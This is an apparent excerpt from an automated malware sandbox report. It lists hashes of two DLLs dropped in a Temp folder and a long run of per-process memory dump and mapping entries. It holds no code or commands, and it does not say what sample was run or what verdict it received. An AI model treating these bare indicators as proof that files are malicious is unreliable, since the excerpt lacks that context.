                                                                                                                                      043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\nsdC03B.tmp\System.dll
                                                                                                                                      MD5

                                                                                                                                      2e025e2cee2953cce0160c3cd2e1a64e

                                                                                                                                      SHA1

                                                                                                                                      dec3da040ea72d63528240598bf14f344efb2a76

                                                                                                                                      SHA256

                                                                                                                                      d821a62802900b068dcf61ddc9fdff2f7ada04b706815ab6e5038b21543da8a5

                                                                                                                                      SHA512

                                                                                                                                      3cafce382b605a68e5a3f35f95b32761685112c5a9da9f87b0a06ec13da4155145bd06ffb63131bf87c3dc8bd61cb085884c5e78c832386d70397e3974854860

                                                                                                                                    • \Users\Admin\AppData\Local\Temp\nsdC03B.tmp\nsExec.dll
                                                                                                                                      MD5

                                                                                                                                      1139fb5cc942e668c8277f8b8f1e5f20

                                                                                                                                      SHA1

                                                                                                                                      94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                                                                                      SHA256

                                                                                                                                      9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                                                                                      SHA512

                                                                                                                                      08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                                                                                    • memory/284-178-0x000001E9D2720000-0x000001E9D2790000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/772-353-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/936-281-0x000001FCFD6B0000-0x000001FCFD720000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/936-279-0x000001FCFCF60000-0x000001FCFCFAB000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/936-186-0x000001FCFCFD0000-0x000001FCFD040000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1100-184-0x0000022791B30000-0x0000022791BA0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1196-205-0x0000025ACAD00000-0x0000025ACADFF000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1020KB

                                                                                                                                    • memory/1196-167-0x0000025AC8770000-0x0000025AC87E0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1196-132-0x00007FF7AA974060-mapping.dmp
                                                                                                                                    • memory/1216-297-0x00000219A3EB0000-0x00000219A3F20000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1216-166-0x00000219A3B00000-0x00000219A3B70000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1256-154-0x000001CB5A5E0000-0x000001CB5A62B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/1256-293-0x000001CB5AF60000-0x000001CB5AFD0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1256-159-0x000001CB5A8D0000-0x000001CB5A940000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1408-188-0x000002490C840000-0x000002490C8B0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1516-193-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      172KB

                                                                                                                                    • memory/1516-191-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/1944-190-0x0000021E26FD0000-0x0000021E27040000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/1944-290-0x0000021E27040000-0x0000021E270B0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2156-173-0x000000001BA80000-0x000000001BA82000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/2156-120-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2156-200-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2156-136-0x0000000001260000-0x0000000001261000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2156-203-0x0000000002460000-0x0000000002462000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/2156-130-0x0000000001240000-0x000000000125C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      112KB

                                                                                                                                    • memory/2156-128-0x0000000001220000-0x0000000001221000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2156-126-0x0000000000DF0000-0x0000000000DF1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2336-180-0x0000022D32210000-0x0000022D32280000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2376-182-0x0000028914880000-0x00000289148F0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2440-116-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2448-195-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/2448-199-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/2556-165-0x000001833F0D0000-0x000001833F140000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2636-172-0x000002BC90080000-0x000002BC900F0000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/2660-177-0x000001D1896C0000-0x000001D189730000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/3064-368-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3412-369-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3752-275-0x000002172FF90000-0x000002172FFA4000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      80KB

                                                                                                                                    • memory/3752-269-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      7.0MB

                                                                                                                                    • memory/3752-271-0x00000001402CA898-mapping.dmp
                                                                                                                                    • memory/3812-352-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3836-277-0x00000000024C0000-0x0000000002504000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      272KB

                                                                                                                                    • memory/3836-247-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3872-267-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3880-355-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/3944-158-0x0000023F23990000-0x0000023F23A00000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      448KB

                                                                                                                                    • memory/4008-153-0x0000000000E10000-0x0000000000E6C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      368KB

                                                                                                                                    • memory/4008-119-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4008-152-0x00000000007D8000-0x00000000008D9000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/4100-321-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4116-282-0x0000000000401480-mapping.dmp
                                                                                                                                    • memory/4116-286-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      284KB

                                                                                                                                    • memory/4116-280-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      284KB

                                                                                                                                    • memory/4124-287-0x0000000000FD0000-0x000000000102C000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      368KB

                                                                                                                                    • memory/4124-276-0x0000000000E60000-0x0000000000F0E000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      696KB

                                                                                                                                    • memory/4124-261-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4136-206-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4136-208-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      88KB

                                                                                                                                    • memory/4144-304-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4160-242-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4160-245-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/4160-246-0x0000000000A50000-0x0000000000A62000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/4168-214-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4168-210-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4176-349-0x0000000007300000-0x0000000007301000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4176-347-0x00000000011F0000-0x00000000011F1000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4176-342-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4212-222-0x0000000002A80000-0x0000000002A82000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4212-216-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4220-223-0x0000000002FD0000-0x0000000002FD2000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4220-238-0x0000000002FD5000-0x0000000002FD7000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4220-237-0x0000000002FD4000-0x0000000002FD5000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4220-215-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4220-235-0x0000000002FD2000-0x0000000002FD4000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4296-239-0x0000000002835000-0x0000000002836000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4296-228-0x0000000002830000-0x0000000002832000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4296-236-0x0000000002832000-0x0000000002834000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/4296-224-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4368-232-0x0000000000840000-0x000000000084D000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      52KB

                                                                                                                                    • memory/4368-254-0x0000000003880000-0x00000000038C8000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      288KB

                                                                                                                                    • memory/4368-229-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4416-350-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4436-253-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4540-363-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4556-360-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4804-259-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      3.5MB

                                                                                                                                    • memory/4804-264-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                      Filesize

                                                                                                                                      3.5MB

                                                                                                                                    • memory/4804-260-0x00000001401FBC30-mapping.dmp
                                                                                                                                    • memory/4852-358-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4920-250-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4940-255-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/4944-301-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5008-241-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5156-305-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5164-320-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5184-351-0x0000000000402F68-mapping.dmp
                                                                                                                                    • memory/5216-343-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5256-359-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5360-310-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5400-366-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5444-346-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5468-331-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5492-332-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5500-356-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5564-311-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5616-312-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5620-357-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5628-365-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5640-313-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5648-334-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5664-367-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5756-335-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5776-316-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5924-317-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5936-361-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5944-362-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5976-364-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/5980-337-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/6052-338-0x0000000000000000-mapping.dmp
                                                                                                                                    • memory/6108-354-0x0000000000000000-mapping.dmp